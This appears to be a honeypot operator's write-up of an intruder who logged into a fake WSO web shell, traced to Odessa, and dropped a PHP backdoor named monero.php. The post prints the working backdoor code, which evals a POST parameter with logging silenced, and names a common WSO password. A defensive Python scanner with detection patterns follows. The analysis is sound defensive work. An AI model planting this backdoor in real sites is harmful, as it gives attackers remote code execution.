Downloaded to my WordPress honey pot's fake WSO web shell. The downloader used the "Php" action of WSO, which is seemingly intended for interactive PHP evaluation by a human user of WSO web shells.
213.231.57.232 did 3 HTTP accesses of the fake WSO web shell:
- GET, 23/Feb/2018:09:46:11 -0700, got the WSO login page.
- POST, 23/Feb/2018:09:46:42 -0700, sent "nhzgrf", a common password for WSO
- POST, 23/Feb/2018:09:46:55 -0700, did a "FilesMan" listing on "/"
- POST, 24/Feb/2018:14:13:48 -0700, sent the dropper code to WSO, "Php" action.
The timing indicates interactive use by a real human. Glory be!
213.231.57.232 has DNS name 213.231.57.232.pool.breezein.net.
DNS name 213.231.57.232.pool.breezein.net matches 213.231.57.232, so that's all good.
whois says that address is associated with a "Docsis" ISP in Odessa, Ukraine:
organisation: ORG-TT21-RIPE
org-name: TOV TRK "Briz"
org-type: LIR
address: Bocharova street 2
address: 65111
address: Odessa
address: UKRAINE
traceroute confirms:
traceroute to 213.231.57.232 (213.231.57.232), 30 hops max, 60 byte packets
1 129-45-246-162.versonetworks.net (162.246.45.129) 71.201 ms 71.173 ms 71.126 ms
2 10.100.100.1 (10.100.100.1) 73.572 ms 73.526 ms 73.526 ms
3 v231.core1.den1.he.net (216.66.73.25) 83.652 ms 83.628 ms 83.601 ms
4 100ge14-1.core1.mci3.he.net (184.105.64.50) 86.246 ms 86.239 ms 86.195 ms
5 100ge8-1.core2.chi1.he.net (184.105.81.210) 121.137 ms 121.100 ms 121.098 ms
6 100ge16-1.core1.nyc4.he.net (184.105.223.162) 121.098 ms 59.768 ms 59.763 ms
7 100ge4-1.core1.par2.he.net (184.105.81.78) 129.763 ms 158.545 ms 158.546 ms
8 100ge5-2.core1.vie1.he.net (184.105.65.6) 143.441 ms 153.737 ms 153.727 ms
9 100ge14-1.core1.waw1.he.net (184.105.65.74) 158.467 ms 158.457 ms 165.934 ms
10 az-international-llc.10gigabitethernet1-6.core1.waw1.he.net (216.66.84.118) 165.932 ms 171.287 ms 171.282 ms
11 194.44.212.253 (194.44.212.253) 171.273 ms 173.254 ms 168.568 ms
12 194.44.6.130 (194.44.6.130) 173.596 ms 173.591 ms 247.634 ms
13 213.231.57.232.pool.breezein.net (213.231.57.232) 237.339 ms 237.323 ms 232.589 ms
p0f3 identifies the IP address as "Windows 7 or 8":
[2018/02/23 09:46:11] mod=syn|cli=213.231.57.232/57621|srv=162.246.45.144/80|subj=cli|os=Windows 7 or 8|dist=10|params=none|raw_sig=4:118+10:0:1440:8192,2:mss,nop,ws,nop,nop,sok:df,id+:0
The initial PHP is a file dropper. It appears to pick a random directory somewhere under Apache's DocumentRoot directory, then decode a Base64 encoded string into a file named monero.php.
The dropper code reports the final URL to the downloader, something like:
p_url_to_check: http://infectedhost.com/blah/blah/monero.php
"monero.php" seems like an odd name to pick, as Monero is currently (February, 2018) gaining credence as the cryptocurrency of choice for cybercrime.
monero.php would contain a simple back door:
<?php
header("Cache-Control: tect");
@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);
if (isset($_POST["x"]))
{
eval($_POST["x"]);
}
?>
That is, an HTTP POST to monero.php would cause any PHP code associated with a POST parameter named x to get evaluated. I'm not sure what the "Cache-Control: tect" HTTP header is supposed to do. There's not even a "Cache-Control: text" HTTP header, much less "tect". That header doesn't seem to bother Firefox version 58 on Linux.
This code appears on Pastebin, dated April 4th, 2017.
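Since the dropper hides monero.php in a random directory under DocumentRoot, the practical defender's check is to sweep the whole tree for the indicators this back door carries: eval() of a request parameter, the error-logging suppression calls, and the odd "Cache-Control: tect" header. The following scanner is an added example, not code from the post or from the dropper; the sample DocumentRoot it builds in a temp directory (the "wp-content/uploads/q7x" drop path and the benign index.php) is constructed for the demonstration.

```python
import os
import re
import tempfile

# Indicators from the back door above: eval() of a request parameter, error suppression, odd header.
EVAL_OF_REQUEST = re.compile(r"eval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\s*\[", re.I)
LOG_SUPPRESSION = re.compile(r"ini_set\s*\(\s*['\"](?:display_errors|log_errors|error_log)['\"]", re.I)
ODD_CACHE_HEADER = re.compile(r"Cache-Control:\s*tect", re.I)

def scan_php_source(src):
    """Return the names of the indicators found in one PHP source string."""
    findings = []
    if EVAL_OF_REQUEST.search(src):
        findings.append("eval-of-request-parameter")
    if len(LOG_SUPPRESSION.findall(src)) >= 2:
        findings.append("error-logging-suppressed")
    if ODD_CACHE_HEADER.search(src):
        findings.append("cache-control-tect-header")
    return findings

def scan_tree(root):
    """Walk a DocumentRoot; map each flagged .php file (relative path) to its indicators."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = scan_php_source(fh.read())
            if found:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = found
    return hits

# Constructed sample: the post's back door dropped into a random-looking
# subdirectory of a DocumentRoot, beside a harmless PHP file.
BACKDOOR = ('<?php\nheader("Cache-Control: tect");\n@error_reporting(0);\n'
            '@ini_set("display_errors",0);\n@ini_set("log_errors",0);\n'
            '@ini_set("error_log",0);\nif (isset($_POST["x"]))\n{\n'
            'eval($_POST["x"]);\n}\n?>\n')
BENIGN = '<?php\necho "hello";\n?>\n'

def demo():
    with tempfile.TemporaryDirectory() as root:
        for rel, body in (("wp-content/uploads/q7x/monero.php", BACKDOOR), ("index.php", BENIGN)):
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(body)
        return scan_tree(root)
```

Run scan_tree() against a real DocumentRoot to list every PHP file carrying these indicators; demo() shows the expected result on the constructed tree, where only the dropped monero.php is flagged.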